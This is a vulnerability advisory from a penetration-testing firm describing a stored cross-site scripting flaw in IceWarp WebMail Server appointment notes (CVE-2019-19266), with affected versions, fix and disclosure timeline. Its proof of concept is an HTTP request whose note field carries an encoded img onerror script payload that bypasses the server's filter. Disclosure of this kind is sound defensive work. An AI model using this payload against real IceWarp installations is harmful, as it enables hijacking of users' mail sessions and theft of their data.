+49 241 510081-0
kontakt@redteam-pentesting.de
DE
DE

Contact

Contact us

+49 241 510081-0
kontakt@redteam-pentesting.de
Contact form
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header
newer
back to overview
older

Text Version

IceWarp: Cross-Site Scripting in Notes

During a penetration test, RedTeam Pentesting discovered that the IceWarp WebMail Server is prone to cross-site scripting attacks in notes for objects. If attackers with access to the IceWarp system provide a manipulated object that is displayed by users, they can run arbitrary JavaScript code in the users’ browsers.

Details

  • Product: IceWarp WebMail Server
  • Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well
  • Fixed Versions: IceWarp 12.2.1.1
  • Vulnerability Type: Cross-Site Scripting
  • Security Risk: high
  • Vendor URL: http://www.icewarp.com/
  • Vendor Status: patch available
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-016
  • Advisory Status: published
  • CVE: CVE-2019-19266
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19266

Introduction

“Secure professional email with own domain and revolutionary integration with chat. Shared calendars for perfect planning.” (from the vendor’s homepage)

More Details

Users can create, modify and share appointments in IceWarp with other users of the web application. Especially noteworthy are the following two XML Entities in the request to create a new appointment:

<evndescformat>text/html</evndescformat>
<evnnote>&lt;h1;&gt;RedTeam Pentesting&lt;/h1;&gt;</evnnote>

These define a note for an appointment. It was found that in notes some HTML entities were rendered, but some entities and attributes were filtered. However, the filter only takes effect when the content type of the note is set to “text/html”. When the content type is left out or set to any other type, the filter is not active, enabling attackers to circumvent the filter and execute JavaScript in the user’s browser. The same is true for notes attached to other objects, such as files or tasks.

Just using the calendar module, at least three ways to attack other IceWarp users are available using cross-site scripting in a note of an appointment:

  • Inviting other attendees to an appointment
  • Sharing access to an appointment
  • Sending a calendar file as a request via email

Especially for the first variant of attacking an IceWarp user by adding that user to a manipulated appointment, no user interaction is required from the attacked user besides opening the IceWarp calendar.

Proof of Concept

Create an appointment using an HTTP request similar to the following:

POST /[...]/webmail/server/webmail.php HTTP/1.1
Host: icewarp.example.com
Content-Type: text/xml

<iq sid="wm-XXXXXXXXXXXXXXXXXXXXXX" type="set">
  <query xmlns="webmail:iq:items">
    <account uid="testuser2@example.com">
      <folder uid="Calendar">
        <item action="add">
          <values>
            <evntitle>Example Appointment</evntitle>
            <meeting_action>0</meeting_action>
            <evnlocation></evnlocation>
            <evntype></evntype>
            <evnsharetype>U</evnsharetype>
            <evndescformat></evndescformat>
            <evnnote>&lt;img style=&quot;display: none;&quot; src=&quot;x&quot; onerror=&quot;alert(&apos;RedTeam Pentesting&apos;)&quot;&gt;</evnnote>
            <evnflags>0</evnflags>
            <evntimeformat>Z</evntimeformat>
            <_tzevnstartdate>2458801</_tzevnstartdate>
            <_tzevnenddate>2458801</_tzevnenddate>
            <_tzevnstarttime>660</_tzevnstarttime>
            <_tzevnendtime>690</_tzevnendtime>
            <_tzid>Europe/Amsterdam</_tzid>
            <ctz>60</ctz>
          </values>
        </item>
      </folder>
    </account>
  </query>
</iq>

Workaround

None known.

Fix

Update to IceWarp 12.2.1.1.

Security Risk

Attackers with access to an IceWarp account could give other legitimate IceWarp users access to manipulated objects. If the attacked user opens the preview of such an object, for example by just opening the calendar, a cross-site scripting vulnerability can be exploited. That could, for example, be used to display a fake login form and get access to the user’s credentials, or to access any data stored in IceWarp such as emails, contacts, tasks, files or appointments. While this requires an attacker with access to an IceWarp account, this kind of access could be gained by exploiting the vulnerability described in rt-sa-2019-15 (https://www.redteam-pentesting.de/advisories/rt-sa-2019-015). This is considered to pose a high risk.

Timeline

  • 2019-11-11 Vulnerability identified
  • 2019-11-15 Vendor notified
  • 2019-11-22 Customer approved disclosure
  • 2019-11-25 CVE number requested
  • 2019-11-25 CVE number assigned
  • 2019-12-02 Vendor released fixed version
  • 2019-12-10 Customer approved disclosure
  • 2019-12-13 Fixed version released
  • 2020-01-02 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/